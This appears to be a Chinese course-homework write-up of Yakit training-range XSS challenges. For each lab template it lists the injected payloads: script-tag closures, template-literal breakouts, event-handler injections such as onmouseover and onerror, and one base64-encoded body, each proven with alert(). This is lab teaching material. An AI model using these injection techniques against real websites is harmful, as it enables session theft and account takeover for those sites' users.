|
XSS 跨站脚本攻击漏洞(二)
yakit 靶场
闭合标签
没有办法闭合标签,尝试在标签内寻找可以触发 js 代码的相关函数或者直接尝试在标签内闭合
<script> 标签法
javascript: 伪协议
console.log(1)
业务系统
xss-4
<script>console.info("Hello" + '{{ .name }}')</script>
')</script><script>alert(1)('
<script>console.info("Hello" + '')</script><script>alert(1)('')</script>
')</script><script>alert('Hello Yakit
<script>console.info("Hello" + '')</script><script>alert('Hello Yakit')</script>
xss-5
<script>const name = "404";console.info("Hello" + `${name}`);</script>
404"</script><script>alert(1)//
<script>const name = "404"; alert(1)//";console.info("Hello" + `${name}`);</script>
test"</script><script>alert("Hello Yakit")//
<script>const name = "test"</script><script>alert("Hello Yakit")//";console.info("Hello" +
`${name}`);</script>
xss-6
console.info("Hello" + `+"`{{ .name }}: ${name}`"+`);
404`)</script><script>alert(1)//
`+alert('XSS Attack!')+`
console.info("Hello" + ``+alert('XSS Attack!')+`: ${name}`);
xss-7
<img style='width: 100px' src="/static/logo.png" onclick='{{ .code }}'/>
alert("Hello Yakit")
Xss-8
<img style='width: 100px' alt='{{.value}}' src="/static/logo.png"
onclick='javascript:alert("Welcome CLICK ME!")'/>
' onmouseover='alert("Hello Yakit")
xss-9
<img style='width: 100px' alt='{{.value}}' src="/static/logo.png"
onclick='javascript:alert("Welcome CLICK ME!")'/>
<img style='width: 100px' alt='404'onmouseover='alert(1)' src="/static/logo.png"
onclick='javascript:alert("Welcome CLICK ME!")'/>
{"value":"value=visitor-name"}
{"value":"value=404'onmouseover='alert(1)"}
404'onmouseover='alert(1)
{"value":"value=404'onmouseover='console.log(1)"}
value=xxxx
{"value":"xxx"}
xss-10
<img style='width: 100px' alt='{{.value}}' src="/static/logo.png"
onclick='javascript:alert("Welcome CLICK ME!")'/>
{"value":"value=404'onmouseover='alert(`Hello Yakit`)"}
eyJ2YWx1ZSI6InZhbHVlPTQwNCdvbm1vdXNlb3Zlcj0nYWxlcnQoYEhlbGxvIFlha2l0YCkgIn0=
xss-11
<img style='width: 100px' alt='value' src="{{ .value }}"
onclick='javascript:alert("Welcome CLICK ME!")'/>
123"onerror="alert(1)
xss-12
href ⾥⾯可以使⽤伪协议触发 js
'onmousemove='alert(123)
xss-13
<img style='width: 100px' src="/static/logo.png" onclick='javascript:alert({{ .code }})'/>
)' onmousemove='(alert(123)
WEB渗透测试工程师系统班250303期 第25节课作业 实操课程内讲解的yakit靶场-xss篇
|
免责声明:
1、本论坛中所有用户发布的内容仅代表作者个人观点,与本网站立场无关,本站不对其真实性、完整性或观点承担任何责任。
2、本论坛所提供的全部信息与内容,不保证其准确性、完整性或时效性。因阅读或使用本站内容而产生的任何误导、损失或风险,本站概不承担任何连带或法律责任。
3、当国家司法、行政机关依照法定程序要求本论坛披露用户信息时,本站予以配合并因此免责。
4、因网络线路故障、技术问题、不可抗力或本站无法控制的其他原因导致的服务中断或暂停,本站不承担由此造成的任何直接或间接损失。
5、对于任何通过技术手段破坏、攻击本论坛系统或扰乱正常秩序的行为,本站有权采取包括但不限于限制账号、封禁账号、追究法律责任等措施。
